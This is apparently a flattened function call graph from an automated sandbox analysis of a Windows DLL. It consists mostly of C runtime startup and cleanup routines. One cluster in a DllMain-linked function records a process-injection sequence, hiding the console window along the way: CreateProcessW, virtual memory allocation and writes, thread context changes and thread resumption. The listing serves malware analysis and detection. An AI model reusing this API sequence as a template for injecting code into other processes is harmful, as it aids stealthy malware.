11027->11026 11029 6cde4999 14 API calls 11028->11029 11030 6cde49fd 11029->11030 11033 6cde4a2e 11030->11033 11034 6cde65ec 15 API calls 11033->11034 11035 6cde4a0e 11034->11035 11035->11013 11211 6cde5b46 11212 6cde5b51 11211->11212 11214 6cde5b77 11211->11214 11213 6cde5b61 FreeLibrary 11212->11213 11212->11214 11213->11212 11215 6cde2345 11218 6cde2393 11215->11218 11219 6cde2350 11218->11219 11220 6cde239c 11218->11220 11220->11219 11227 6cde25d9 11220->11227 11223 6cde25d9 47 API calls 11224 6cde23e2 11223->11224 11241 6cde36a8 11224->11241 11228 6cde25e7 23 API calls 11227->11228 11229 6cde25de 11228->11229 11230 6cde23d7 11229->11230 11231 6cde5f8c __fassign 2 API calls 11229->11231 11230->11223 11232 6cde375e 11231->11232 11233 6cde5fd1 __fassign 37 API calls 11232->11233 11236 6cde3769 11232->11236 11233->11236 11234 6cde3792 11238 6cde2e8b __fassign 23 API calls 11234->11238 11235 6cde3773 IsProcessorFeaturePresent 11237 6cde377f 11235->11237 11236->11234 11236->11235 11239 6cde3f9a __fassign 8 API calls 11237->11239 11240 6cde379c 11238->11240 11239->11234 11242 6cde36b4 ___scrt_is_nonwritable_in_current_image 11241->11242 11243 6cde3c77 __fassign 37 API calls 11242->11243 11244 6cde36b9 11243->11244 11245 6cde3759 __fassign 37 API calls 11244->11245 11246 6cde36e3 11245->11246 10700 6cdd88c0 10724 6cdd891f __DllMainCRTStartup@12 10700->10724 10701 6cdde572 NtSetContextThread NtResumeThread 10701->10724 10702 6cddec6b GetConsoleWindow ShowWindow 10702->10724 10703 6cddb321 CreateProcessW 10703->10724 10704 6cddeb83 10705 6cde0dc0 _ValidateLocalCookies 5 API calls 10704->10705 10706 6cddeb8d 10705->10706 10707 6cddeec5 NtGetContextThread 10707->10724 10708 6cdddf84 NtWriteVirtualMemory 10708->10724 10709 6cddd4d8 NtReadVirtualMemory 10709->10724 10710 6cddf5ab CloseHandle 10710->10724 10711 6cdde352 NtCreateThreadEx 10711->10724 10712 6cddf857 NtWriteVirtualMemory 10720 6cddee72 __DllMainCRTStartup@12 10712->10720 10715 6cddc1d9 NtWriteVirtualMemory 10715->10724 10716 6cddfb38 CloseHandle 10716->10724 10717 6cddbaaa NtAllocateVirtualMemory 10717->10724 10718 6cddee0d VirtualAlloc 10718->10720 10719 6cddb697 NtGetContextThread 10719->10724 10720->10724 10721 6cdda7e7 GetConsoleWindow ShowWindow 10721->10724 10722 6cdd1010 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10722->10724 10723 6cdde754 CloseHandle 10723->10724 10724->10701 10724->10702 10724->10703 10724->10704 10724->10707 10724->10708 10724->10709 10724->10710 10724->10711 10724->10712 10724->10715 10724->10716 10724->10717 10724->10718 10724->10719 10724->10721 10724->10722 10724->10723 10725 6cdd1210 26 API calls 10724->10725 10726 6cddbbd4 NtWriteVirtualMemory 10724->10726 10727 6cddf6d1 CreateProcessW 10724->10727 10728 6cddc53b NtWriteVirtualMemory 10724->10728 10729 6cddd753 NtWriteVirtualMemory 10724->10729 10730 6cddb011 VirtualAlloc 10724->10730 10731 6cddfa22 NtWriteVirtualMemory 10724->10731 10732 6cdde8e4 CloseHandle 10724->10732 10733 6cdd6e40 10724->10733 10725->10724 10726->10724 10727->10724 10728->10724 10729->10724 10730->10724 10731->10724 10732->10724 10737 6cdd6e91 10733->10737 10734 6cdd762b GetModuleHandleW 10744 6cdd4810 10734->10744 10736 6cdd78ca NtQueryInformationProcess 10736->10737 10737->10734 10737->10736 10738 6cdd7f04 GetModuleHandleW 10737->10738 10741 6cdd7dd6 10737->10741 10739 6cdd4810 5 API calls 10738->10739 10740 6cdd7662 __DllMainCRTStartup@12 10739->10740 10740->10737 10742 6cde0dc0 _ValidateLocalCookies 5 API calls 10741->10742 10743 6cdd7de6 NtAllocateVirtualMemory 10742->10743 10743->10724 10745 6cdd4878 10744->10745 10746 6cde0dc0 _ValidateLocalCookies 5 API calls 10745->10746 10747 6cdd6b79 10746->10747 10747->10740 11251 6cde5b7c GetProcessHeap 11138 6cde47fd 11139 6cde480e 11138->11139 11140 6cde4949 11139->11140 11141 6cde4273 _free 14 API calls 11139->11141 11142 6cde0dc0 _ValidateLocalCookies 5 API calls 11140->11142 11141->11140 11143 6cde4958 11142->11143 11252 6cde6578 11253 6cde64a7 ___scrt_uninitialize_crt 66 API calls 11252->11253 11254 6cde6580 11253->11254 11262 6cde8586 11254->11262 11256 6cde6585 11272 6cde8631 11256->11272 11259 6cde65af 11260 6cde4273 _free 14 API calls 11259->11260 11261 6cde65ba 11260->11261 11263 6cde8592 ___scrt_is_nonwritable_in_current_image 11262->11263 11276 6cde3f0a EnterCriticalSection 11263->11276 11265 6cde8609 11290 6cde8628 11265->11290 11266 6cde859d 11266->11265 11268 6cde85dd DeleteCriticalSection 11266->11268 11277 6cde8cbb 11266->11277 11271 6cde4273 _free 14 API calls 11268->11271 11271->11266 11273 6cde6594 DeleteCriticalSection 11272->11273 11274 6cde8648 11272->11274 11273->11256 11273->11259 11274->11273 11275 6cde4273 _free 14 API calls 11274->11275 11275->11273 11276->11266 11278 6cde8cc7 ___scrt_is_nonwritable_in_current_image 11277->11278 11279 6cde8ce6 11278->11279 11280 6cde8cd1 11278->11280 11287 6cde8ce1 11279->11287 11293 6cde65c4 EnterCriticalSection 11279->11293 11281 6cde4203 __dosmaperr 14 API calls 11280->11281 11282 6cde8cd6 11281->11282 11285 6cde4146 __fassign 25 API calls 11282->11285 11284 6cde8d03 11294 6cde8c44 11284->11294 11285->11287 11287->11266 11288 6cde8d0e 11310 6cde8d35 11288->11310 11382 6cde3f52 LeaveCriticalSection 11290->11382 11292 6cde8615 11292->11256 11293->11284 11295 6cde8c66 11294->11295 11296 6cde8c51 11294->11296 11299 6cde63fa ___scrt_uninitialize_crt 62 API calls 11295->11299 11302 6cde8c61 11295->11302 11297 6cde4203 __dosmaperr 14 API calls 11296->11297 11298 6cde8c56 11297->11298 11300 6cde4146 __fassign 25 API calls 11298->11300 11301 6cde8c7b 11299->11301 11300->11302 11303 6cde8631 14 API calls 11301->11303 11302->11288 11304 6cde8c83 11303->11304 11305 6cde67f0 ___scrt_uninitialize_crt 25 API calls 11304->11305 11306 6cde8c89 11305->11306 11313 6cde92b7 11306->11313 11309 6cde4273 _free 14 API calls 11309->11302 11381 6cde65d8 LeaveCriticalSection 11310->11381 11312 6cde8d3d 11312->11287 11314 6cde92c8 11313->11314 11317 6cde92dd 11313->11317 11316 6cde41f0 __dosmaperr 14 API calls 11314->11316 11315 6cde9326 11318 6cde41f0 __dosmaperr 14 API calls 11315->11318 11319 6cde92cd 11316->11319 11317->11315 11320 6cde9304 11317->11320 11321 6cde932b 11318->11321 11322 6cde4203 __dosmaperr 14 API calls 11319->11322 11328 6cde922b 11320->11328 11324 6cde4203 __dosmaperr 14 API calls 11321->11324 11325 6cde8c8f 11322->11325 11326 6cde9333 11324->11326 11325->11302 11325->11309 11327 6cde4146 __fassign 25 API calls 11326->11327 11327->11325 11329 6cde9237 ___scrt_is_nonwritable_in_current_image 11328->11329 11339 6cde78df EnterCriticalSection 11329->11339 11331 6cde9245 11332 6cde926c 11331->11332 11333 6cde9277 11331->11333 11340 6cde9344 11332->11340 11335 6cde4203 __dosmaperr 14 API calls 11333->11335 11336 6cde9272 11335->11336 11355 6cde92ab 11336->11355 11339->11331 11358 6cde79b6 11340->11358 11342 6cde935a 11371 6cde7925 11342->11371 11344 6cde9354 11344->11342 11346 6cde79b6 ___scrt_uninitialize_crt 25 API calls 11344->11346 11354 6cde938c 11344->11354 11348 6cde9383 11346->11348 11347 6cde79b6 ___scrt_uninitialize_crt 25 API calls 11349 6cde9398 CloseHandle 11347->11349 11351 6cde79b6 ___scrt_uninitialize_crt 25 API calls 11348->11351 11349->11342 11352 6cde93a4 GetLastError 11349->11352 11350 6cde41cd __dosmaperr 14 API calls 11353 6cde93d4 11350->11353 11351->11354 11352->11342 11353->11336 11354->11342 11354->11347 11380 6cde7902 LeaveCriticalSection 11355->11380 11357 6cde9294 11357->11325 11359 6cde79c3 11358->11359 11361 6cde79d8 11358->11361 11360 6cde41f0 __dosmaperr 14 API calls 11359->11360 11363 6cde79c8 11360->11363 11362 6cde41f0 __dosmaperr 14 API calls 11361->11362 11366 6cde79fd 11361->11366 11364 6cde7a08 11362->11364 11365 6cde4203 __dosmaperr 14 API calls 11363->11365 11367 6cde4203 __dosmaperr 14 API calls 11364->11367 11368 6cde79d0 11365->11368 11366->11344 11369 6cde7a10 11367->11369 11368->11344 11370 6cde4146 __fassign 25 API calls 11369->11370 11370->11368 11372 6cde799b 11371->11372 11373 6cde7934 11371->11373 11374 6cde4203 __dosmaperr 14 API calls 11372->11374 11373->11372 11379 6cde795e 11373->11379 11375 6cde79a0 11374->11375 11376 6cde41f0 __dosmaperr 14 API calls 11375->11376 11377 6cde798b 11376->11377 11377->11350 11377->11353 11378 6cde7985 SetStdHandle 11378->11377 11379->11377 11379->11378 11380->11357 11381->11312 11382->11292 11383 6cde4377 11384 6cde4385 11383->11384 11385 6cde43a1 11383->11385 11388 6cde4999 14 API calls 11384->11388 11386 6cde43c8 11385->11386 11387 6cde43a8 11385->11387 11390 6cde556d ___scrt_uninitialize_crt WideCharToMultiByte 11386->11390 11389 6cde438f 11387->11389 11406 6cde49b3 11387->11406 11388->11389 11392 6cde43d8 11390->11392 11393 6cde43df GetLastError 11392->11393 11394 6cde43f5 11392->11394 11396 6cde41cd __dosmaperr 14 API calls 11393->11396 11395 6cde4406 11394->11395 11397 6cde49b3 15 API calls 11394->11397 11395->11389 11398 6cde556d ___scrt_uninitialize_crt WideCharToMultiByte 11395->11398 11399 6cde43eb 11396->11399 11397->11395 11400 6cde441e 11398->11400 11401 6cde4203 __dosmaperr 14 API calls 11399->11401 11400->11389 11402 6cde4425 GetLastError 11400->11402 11401->11389 11403 6cde41cd __dosmaperr 14 API calls 11402->11403 11404 6cde4431 11403->11404 11405 6cde4203 __dosmaperr 14 API calls 11404->11405 11405->11389 11407 6cde4999 14 API calls 11406->11407 11408 6cde49c1 11407->11408 11409 6cde4a2e 15 API calls 11408->11409 11410 6cde49cf 11409->11410 11410->11389 11036 6cde7270 11039 6cde7287 11036->11039 11038 6cde7282 11040 6cde72a9 11039->11040 11041 6cde7295 11039->11041 11042 6cde72b1 11040->11042 11045 6cde72c3 11040->11045 11043 6cde4203 __dosmaperr 14 API calls 11041->11043 11044 6cde4203 __dosmaperr 14 API calls 11042->11044 11046 6cde729a 11043->11046 11047 6cde72b6 11044->11047 11048 6cde379d __fassign 37 API calls 11045->11048 11051 6cde72c1 11045->11051 11049 6cde4146 __fassign 25 API calls 11046->11049 11050 6cde4146 __fassign 25 API calls 11047->11050 11048->11051 11052 6cde72a5 11049->11052 11050->11051 11051->11038 11052->11038 10768 6cde8ef1 10769 6cde8f11 10768->10769 10772 6cde8f48 10769->10772 10771 6cde8f3b 10773 6cde8f4f 10772->10773 10774 6cde8fb0 10773->10774 10778 6cde8f6f 10773->10778 10776 6cde9bce 10774->10776 10781 6cde9cd7 10774->10781 10776->10771 10778->10776 10779 6cde9cd7 20 API calls 10778->10779 10780 6cde9bfe 10779->10780 10780->10771 10782 6cde9ce0 10781->10782 10785 6cdea1f3 10782->10785 10786 6cdea232 __startOneArgErrorHandling 10785->10786 10790 6cdea2b4 __startOneArgErrorHandling 10786->10790 10793 6cdea5fe 10786->10793 10789 6cdea2e9 10791 6cde0dc0 _ValidateLocalCookies 5 API calls 10789->10791 10790->10789 10796 6cdea917 10790->10796 10792 6cde8ffe 10791->10792 10792->10771 10803 6cdea621 10793->10803 10797 6cdea939 10796->10797 10798 6cdea924 10796->10798 10799 6cde4203 __dosmaperr 14 API calls 10797->10799 10800 6cdea93e 10798->10800 10801 6cde4203 __dosmaperr 14 API calls 10798->10801 10799->10800 10800->10789 10802 6cdea931 10801->10802 10802->10789 10804 6cdea64c __raise_exc 10803->10804 10805 6cdea845 RaiseException 10804->10805 10806 6cdea61c 10805->10806 10806->10790 11053 6cde766a 11054 6cde519a 47 API calls 11053->11054 11055 6cde766f 11054->11055 11411 6cde5d61 11414 6cde5d66 11411->11414 11413 6cde5d89 11414->11413 11415 6cde780c 11414->11415 11416 6cde7819 11415->11416 11420 6cde783b 11415->11420 11417 6cde7827 DeleteCriticalSection 11416->11417 11418 6cde7835 11416->11418 11417->11417 11417->11418 11419 6cde4273 _free 14 API calls 11418->11419 11419->11420 11420->11414 11056 6cde941b IsProcessorFeaturePresent 11421 6cde6f19 11424 6cde6cce 11421->11424 11422 6cde0dc0 _ValidateLocalCookies 5 API calls 11423 6cde6cdb 11422->11423 11424->11422 11424->11424 11425 6cde2d15 11426 6cde36a8 37 API calls 11425->11426 11427 6cde2d1d 11426->11427 10807 6cde2490 10808 6cde24b0 10807->10808 10809 6cde24a2 10807->10809 10810 6cde0dc0 _ValidateLocalCookies 5 API calls 10809->10810 10810->10808 10811 6cde6890 10814 6cde6817 10811->10814 10815 6cde6823 ___scrt_is_nonwritable_in_current_image 10814->10815 10822 6cde3f0a EnterCriticalSection 10815->10822 10817 6cde685b 10823 6cde6879 10817->10823 10818 6cde682d 10818->10817 10820 6cde6c25 __fassign 14 API calls 10818->10820 10820->10818 10822->10818 10826 6cde3f52 LeaveCriticalSection 10823->10826 10825 6cde6867 10826->10825 11428 6cde2110 11429 6cde212e 11428->11429 11440 6cde20d0 11429->11440 11441 6cde20ef 11440->11441 11442 6cde20e2 11440->11442 11443 6cde0dc0 _ValidateLocalCookies 5 API calls 11442->11443 11443->11441 10267 6cde110e 10268 6cde111c 10267->10268 10269 6cde1117 10267->10269 10273 6cde0fd8 10268->10273 10288 6cde12a0 10269->10288 10276 6cde0fe4 ___scrt_is_nonwritable_in_current_image 10273->10276 10274 6cde0ff3 10275 6cde100d dllmain_raw 10275->10274 10277 6cde1027 dllmain_crt_dispatch 10275->10277 10276->10274 10276->10275 10278 6cde1008 10276->10278 10277->10274 10277->10278 10279 6cddfcb0 __DllMainCRTStartup@12 5 API calls 10278->10279 10281 6cde1048 10279->10281 10280 6cde1079 10280->10274 10282 6cde1082 dllmain_crt_dispatch 10280->10282 10281->10280 10283 6cddfcb0 __DllMainCRTStartup@12 5 API calls 10281->10283 10282->10274 10284 6cde1095 dllmain_raw 10282->10284 10285 6cde1060 10283->10285 10284->10274 10286 6cde0f28 __DllMainCRTStartup@12 84 API calls 10285->10286 10287 6cde106e dllmain_raw 10286->10287 10287->10280 10289 6cde12b6 10288->10289 10291 6cde12bf 10289->10291 10292 6cde1253 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 10289->10292 10291->10268 10292->10291 11148 6cde5b8e GetStartupInfoW 11149 6cde5c48 11148->11149 11150 6cde5bb4 11148->11150 11150->11149 11154 6cde7841 11150->11154 11152 6cde5c0c GetFileType 11153 6cde5bdc 11152->11153 11153->11149 11153->11152 11155 6cde784d ___scrt_is_nonwritable_in_current_image 11154->11155 11156 6cde7856 11155->11156 11157 6cde7877 11155->11157 11158 6cde4203 __dosmaperr 14 API calls 11156->11158 11167 6cde3f0a EnterCriticalSection 11157->11167 11160 6cde785b 11158->11160 11161 6cde4146 __fassign 25 API calls 11160->11161 11162 6cde7865 11161->11162 11162->11153 11163 6cde78af 11175 6cde78d6 11163->11175 11164 6cde7883 11164->11163 11168 6cde7791 11164->11168 11167->11164 11169 6cde4216 __dosmaperr 14 API calls 11168->11169 11171 6cde77a3 11169->11171 11170 6cde77b0 11172 6cde4273 _free 14 API calls 11170->11172 11171->11170 11173 6cde5a42 6 API calls 11171->11173 11174 6cde7805 11172->11174 11173->11171 11174->11164 11178 6cde3f52 LeaveCriticalSection 11175->11178 11177 6cde78dd 11177->11162 11178->11177 11179 6cde358d 11182 6cde3613 11179->11182 11183 6cde3627 11182->11183 11185 6cde35a0 11182->11185 11184 6cde4273 _free 14 API calls 11183->11184 11183->11185 11184->11185 11057 6cde1407 11058 6cde140f ___scrt_release_startup_lock 11057->11058 11061 6cde2a7f 11058->11061 11060 6cde1437 11062 6cde2a8e 11061->11062 11063 6cde2a92 11061->11063 11062->11060 11066 6cde2a9f 11063->11066 11067 6cde3dce __dosmaperr 14 API calls 11066->11067 11068 6cde2a9b 11067->11068 11068->11060 11444 6cde9f07 11445 6cde9f20 __startOneArgErrorHandling 11444->11445 11446 6cdea345 20 API calls 11445->11446 11447 6cde9f49 __startOneArgErrorHandling 11445->11447 11446->11447 11186 6cde3584 11187 6cde22c6 ___scrt_uninitialize_crt 7 API calls 11186->11187 11188 6cde358b 11187->11188 11069 6cde9c05 11071 6cde9c2d 11069->11071 11070 6cde9c65 11071->11070 11072 6cde9c5e 11071->11072 11073 6cde9c57 11071->11073 11078 6cde9cc0 11072->11078 11074 6cde9cd7 20 API calls 11073->11074 11077 6cde9c5c 11074->11077 11079 6cde9ce0 11078->11079 11080 6cdea1f3 __startOneArgErrorHandling 20 API calls 11079->11080 11081 6cde9c63 11080->11081 10827 6cde3e83 10835 6cde5943 10827->10835 10830 6cde3e97 10831 6cde3dce __dosmaperr 14 API calls 10832 6cde3e9f 10831->10832 10833 6cde3eac 10832->10833 10834 6cde3eaf __DllMainCRTStartup@12 6 API calls 10832->10834 10834->10830 10836 6cde5861 __dosmaperr 5 API calls 10835->10836 10837 6cde595f 10836->10837 10838 6cde5977 TlsAlloc 10837->10838 10839 6cde3e8d 10837->10839 10838->10839 10839->10830 10839->10831 10840 6cde6c80 10841 6cde6cba 10840->10841 10842 6cde4203 __dosmaperr 14 API calls 10841->10842 10847 6cde6cce 10841->10847 10843 6cde6cc3 10842->10843 10844 6cde4146 __fassign 25 API calls 10843->10844 10844->10847 10845 6cde0dc0 _ValidateLocalCookies 5 API calls 10846 6cde6cdb 10845->10846 10847->10845 11082 6cde9001 11083 6cde9025 11082->11083 11084 6cde903e 11083->11084 11086 6cde9f07 __startOneArgErrorHandling 11083->11086 11087 6cde9088 11084->11087 11090 6cde9d13 11084->11090 11089 6cde9f49 __startOneArgErrorHandling 11086->11089 11098 6cdea345 11086->11098 11091 6cde9d26 DecodePointer 11090->11091 11092 6cde9d36 11090->11092 11091->11092 11093 6cde9d7a 11092->11093 11094 6cde9d65 11092->11094 11095 6cde9dc1 11092->11095 11093->11095 11097 6cde4203 __dosmaperr 14 API calls 11093->11097 11094->11095 11096 6cde4203 __dosmaperr 14 API calls 11094->11096 11095->11087 11096->11095 11097->11095 11099 6cdea37e __startOneArgErrorHandling 11098->11099 11100 6cdea621 __raise_exc RaiseException 11099->11100 11101 6cdea3a5 __startOneArgErrorHandling 11099->11101 11100->11101 11102 6cdea3e8 11101->11102 11103 6cdea3c3 11101->11103 11104 6cdea917 __startOneArgErrorHandling 14 API calls 11102->11104 11109 6cdea946 11103->11109 11106 6cdea3e3 __startOneArgErrorHandling 11104->11106 11107 6cde0dc0 _ValidateLocalCookies 5 API calls 11106->11107 11108 6cdea40c 11107->11108 11108->11089 11110 6cdea955 11109->11110 11111 6cdea9c9 __startOneArgErrorHandling 11110->11111 11112 6cdea974 __startOneArgErrorHandling 11110->11112 11113 6cdea917 __startOneArgErrorHandling 14 API calls 11111->11113 11115 6cdea9c2 11112->11115 11116 6cdea917 __startOneArgErrorHandling 14 API calls 11112->11116 11114 6cdea9de 11113->11114 11114->11106 11115->11106 11116->11115 11448 6cde5d01 11449 6cde5d0d ___scrt_is_nonwritable_in_current_image 11448->11449 11460 6cde3f0a EnterCriticalSection 11449->11460 11451 6cde5d14 11452 6cde7841 26 API calls 11451->11452 11453 6cde5d23 11452->11453 11454 6cde5d32 11453->11454 11461 6cde5b97 GetStartupInfoW 11453->11461 11467 6cde5d58 11454->11467 11459 6cde5c4d 2 API calls 11459->11454 11460->11451 11462 6cde5bb4 11461->11462 11464 6cde5c48 11461->11464 11463 6cde7841 26 API calls 11462->11463 11462->11464 11465 6cde5bdc 11463->11465 11464->11459 11465->11464 11466 6cde5c0c GetFileType 11465->11466 11466->11465 11470 6cde3f52 LeaveCriticalSection 11467->11470 11469 6cde5d43 11470->11469 10848 6cde46be 10855 6cde4a4d 10848->10855 10851 6cde4273 _free 14 API calls 10853 6cde46d8 10851->10853 10852 6cde4273 _free 14 API calls 10854 6cde467a 10852->10854 10853->10852 10856 6cde4a5f 10855->10856 10860 6cde46c9 10855->10860 10857 6cde4a64 10856->10857 10859 6cde4a8a 10856->10859 10858 6cde4216 __dosmaperr 14 API calls 10857->10858 10862 6cde4a6d 10858->10862 10859->10860 10866 6cde56df 10859->10866 10860->10851 10860->10853 10864 6cde4273 _free 14 API calls 10862->10864 10863 6cde4aaa 10865 6cde4273 _free 14 API calls 10863->10865 10864->10860 10865->10860 10867 6cde56ec 10866->10867 10868 6cde5707 10866->10868 10867->10868 10869 6cde56f8 10867->10869 10870 6cde5716 10868->10870 10875 6cde7679 10868->10875 10871 6cde4203 __dosmaperr 14 API calls 10869->10871 10882 6cde76ac 10870->10882 10873 6cde56fd __DllMainCRTStartup@12 10871->10873 10873->10863 10876 6cde7699 HeapSize 10875->10876 10877 6cde7684 10875->10877 10876->10870 10878 6cde4203 __dosmaperr 14 API calls 10877->10878 10879 6cde7689 10878->10879 10880 6cde4146 __fassign 25 API calls 10879->10880 10881 6cde7694 10880->10881 10881->10870 10883 6cde76b9 10882->10883 10884 6cde76c4 10882->10884 10885 6cde65ec 15 API calls 10883->10885 10886 6cde76cc 10884->10886 10892 6cde76d5 __dosmaperr 10884->10892 10890 6cde76c1 10885->10890 10887 6cde4273 _free 14 API calls 10886->10887 10887->10890 10888 6cde76ff HeapReAlloc 10888->10890 10888->10892 10889 6cde76da 10891 6cde4203 __dosmaperr 14 API calls 10889->10891 10890->10873 10891->10890 10892->10888 10892->10889 10893 6cde5e35 __dosmaperr 2 API calls 10892->10893 10893->10892 11471 6cde8f3f 11473 6cde8f48 11471->11473 11472 6cde8fb0 11474 6cde9cd7 20 API calls 11472->11474 11475 6cde9bce 11472->11475 11473->11472 11477 6cde8f6f 11473->11477 11476 6cde8ffe 11474->11476 11477->11475 11478 6cde9cd7 20 API calls 11477->11478 11479 6cde9bfe 11478->11479 10894 6cde64b0 10895 6cde64bd 10894->10895 10896 6cde4216 __dosmaperr 14 API calls 10895->10896 10897 6cde64d7 10896->10897 10898 6cde4273 _free 14 API calls 10897->10898 10899 6cde64e3 10898->10899 10900 6cde4216 __dosmaperr 14 API calls 10899->10900 10903 6cde6509 10899->10903 10901 6cde64fd 10900->10901 10904 6cde4273 _free 14 API calls 10901->10904 10902 6cde5a42 6 API calls 10902->10903 10903->10902 10905 6cde6515 10903->10905 10904->10903 11121 6cde9430 11124 6cde944e 11121->11124 11123 6cde9446 11125 6cde9453 11124->11125 11126 6cde9d13 15 API calls 11125->11126 11128 6cde94e8 11125->11128 11127 6cde967f 11126->11127 11127->11123 11128->11123 10293 6cde31ad 10304 6cde519a 10293->10304 10299 6cde4273 _free 14 API calls 10301 6cde31f9 10299->10301 10302 6cde4273 _free 14 API calls 10303 6cde31ca 10302->10303 10303->10299 10305 6cde31bf 10304->10305 10306 6cde51a3 10304->10306 10310 6cde565b GetEnvironmentStringsW 10305->10310 10341 6cde3d34 10306->10341 10311 6cde56cb 10310->10311 10312 6cde5672 10310->10312 10313 6cde31c4 10311->10313 10314 6cde56d1 FreeEnvironmentStringsW 10311->10314 10315 6cde556d ___scrt_uninitialize_crt WideCharToMultiByte 10312->10315 10313->10303 10324 6cde31ff 10313->10324 10314->10313 10316 6cde568b 10315->10316 10316->10311 10317 6cde5695 10316->10317 10318 6cde65ec 15 API calls 10317->10318 10319 6cde569b 10318->10319 10320 6cde56b3 10319->10320 10321 6cde556d ___scrt_uninitialize_crt WideCharToMultiByte 10319->10321 10322 6cde4273 _free 14 API calls 10320->10322 10321->10320 10323 6cde56c8 10322->10323 10323->10311 10325 6cde3214 10324->10325 10326 6cde4216 __dosmaperr 14 API calls 10325->10326 10337 6cde323b 10326->10337 10327 6cde32a0 10328 6cde4273 _free 14 API calls 10327->10328 10329 6cde31d5 10328->10329 10329->10302 10330 6cde4216 __dosmaperr 14 API calls 10330->10337 10331 6cde32a2 10690 6cde32cf 10331->10690 10335 6cde4273 _free 14 API calls 10335->10327 10336 6cde32c2 10696 6cde4156 IsProcessorFeaturePresent 10336->10696 10337->10327 10337->10330 10337->10331 10337->10336 10339 6cde4273 _free 14 API calls 10337->10339 10681 6cde36ff 10337->10681 10339->10337 10340 6cde32ce 10342 6cde3d3f 10341->10342 10347 6cde3d45 10341->10347 10343 6cde59c1 __dosmaperr 6 API calls 10342->10343 10343->10347 10344 6cde5a00 __dosmaperr 6 API calls 10346 6cde3d5f 10344->10346 10345 6cde3d4b 10354 6cde3dc4 10345->10354 10385 6cde3759 10345->10385 10346->10345 10348 6cde4216 __dosmaperr 14 API calls 10346->10348 10347->10344 10347->10345 10350 6cde3d6f 10348->10350 10352 6cde3d8c 10350->10352 10353 6cde3d77 10350->10353 10356 6cde5a00 __dosmaperr 6 API calls 10352->10356 10355 6cde5a00 __dosmaperr 6 API calls 10353->10355 10366 6cde4fe6 10354->10366 10357 6cde3d83 10355->10357 10358 6cde3d98 10356->10358 10362 6cde4273 _free 14 API calls 10357->10362 10359 6cde3d9c 10358->10359 10360 6cde3dab 10358->10360 10363 6cde5a00 __dosmaperr 6 API calls 10359->10363 10361 6cde3a79 __dosmaperr 14 API calls 10360->10361 10364 6cde3db6 10361->10364 10362->10345 10363->10357 10365 6cde4273 _free 14 API calls 10364->10365 10365->10345 10480 6cde50fa 10366->10480 10396 6cde5f8c 10385->10396 10388 6cde3769 10390 6cde3792 10388->10390 10391 6cde3773 IsProcessorFeaturePresent 10388->10391 10432 6cde2e8b 10390->10432 10392 6cde377f 10391->10392 10426 6cde3f9a 10392->10426 10435 6cde5ebe 10396->10435 10399 6cde5fd1 10400 6cde5fdd ___scrt_is_nonwritable_in_current_image 10399->10400 10401 6cde3dce __dosmaperr 14 API calls 10400->10401 10405 6cde600a __fassign 10400->10405 10408 6cde6004 __fassign 10400->10408 10401->10408 10402 6cde6051 10403 6cde4203 __dosmaperr 14 API calls 10402->10403 10404 6cde6056 10403->10404 10406 6cde4146 __fassign 25 API calls 10404->10406 10407 6cde607d 10405->10407 10446 6cde3f0a EnterCriticalSection 10405->10446 10425 6cde603b 10406->10425 10411 6cde60bf 10407->10411 10412 6cde61b0 10407->10412 10422 6cde60ee 10407->10422 10408->10402 10408->10405 10408->10425 10411->10422 10447 6cde3c77 GetLastError 10411->10447 10413 6cde61bb 10412->10413 10478 6cde3f52 LeaveCriticalSection 10412->10478 10416 6cde2e8b __fassign 23 API calls 10413->10416 10418 6cde61c3 10416->10418 10419 6cde3c77 __fassign 37 API calls 10423 6cde6143 10419->10423 10421 6cde3c77 __fassign 37 API calls 10421->10422 10474 6cde615d 10422->10474 10424 6cde3c77 __fassign 37 API calls 10423->10424 10423->10425 10424->10425 10425->10388 10427 6cde3fb6 __DllMainCRTStartup@12 10426->10427 10428 6cde3fe2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10427->10428 10429 6cde40b3 __DllMainCRTStartup@12 10428->10429 10430 6cde0dc0 _ValidateLocalCookies 5 API calls 10429->10430 10431 6cde40d1 10430->10431 10431->10390 10433 6cde2d31 __DllMainCRTStartup@12 23 API calls 10432->10433 10434 6cde2e9c 10433->10434 10436 6cde5eca ___scrt_is_nonwritable_in_current_image 10435->10436 10441 6cde3f0a EnterCriticalSection 10436->10441 10438 6cde5ed8 10442 6cde5f16 10438->10442 10441->10438 10445 6cde3f52 LeaveCriticalSection 10442->10445 10444 6cde375e 10444->10388 10444->10399 10445->10444 10446->10407 10448 6cde3c8e 10447->10448 10451 6cde3c94 10447->10451 10449 6cde59c1 __dosmaperr 6 API calls 10448->10449 10449->10451 10450 6cde5a00 __dosmaperr 6 API calls 10452 6cde3cb2 10450->10452 10451->10450 10471 6cde3c9a SetLastError 10451->10471 10453 6cde4216 __dosmaperr 14 API calls 10452->10453 10452->10471 10455 6cde3cc2 10453->10455 10458 6cde3cca 10455->10458 10459 6cde3ce1 10455->10459 10456 6cde3d2e 10461 6cde3759 __fassign 35 API calls 10456->10461 10457 6cde3d28 10457->10421 10460 6cde5a00 __dosmaperr 6 API calls 10458->10460 10462 6cde5a00 __dosmaperr 6 API calls 10459->10462 10463 6cde3cd8 10460->10463 10464 6cde3d33 10461->10464 10465 6cde3ced 10462->10465 10468 6cde4273 _free 14 API calls 10463->10468 10466 6cde3d02 10465->10466 10467 6cde3cf1 10465->10467 10470 6cde3a79 __dosmaperr 14 API calls 10466->10470 10469 6cde5a00 __dosmaperr 6 API calls 10467->10469 10468->10471 10469->10463 10472 6cde3d0d 10470->10472 10471->10456 10471->10457 10473 6cde4273 _free 14 API calls 10472->10473 10473->10471 10475 6cde6134 10474->10475 10476 6cde6163 10474->10476 10475->10419 10475->10423 10475->10425 10479 6cde3f52 LeaveCriticalSection 10476->10479 10478->10413 10479->10475 10481 6cde5106 ___scrt_is_nonwritable_in_current_image 10480->10481 10482 6cde5120 10481->10482 10524 6cde3f0a EnterCriticalSection 10481->10524 10484 6cde4ff9 10482->10484 10486 6cde3759 __fassign 37 API calls 10482->10486 10491 6cde4d90 10484->10491 10485 6cde515c 10525 6cde5179 10485->10525 10488 6cde5199 10486->10488 10489 6cde5130 10489->10485 10490 6cde4273 _free 14 API calls 10489->10490 10490->10485 10529 6cde379d 10491->10529 10524->10489 10528 6cde3f52 LeaveCriticalSection 10525->10528 10527 6cde5180 10527->10482 10528->10527 10530 6cde37bd 10529->10530 10531 6cde3c77 __fassign 37 API calls 10530->10531 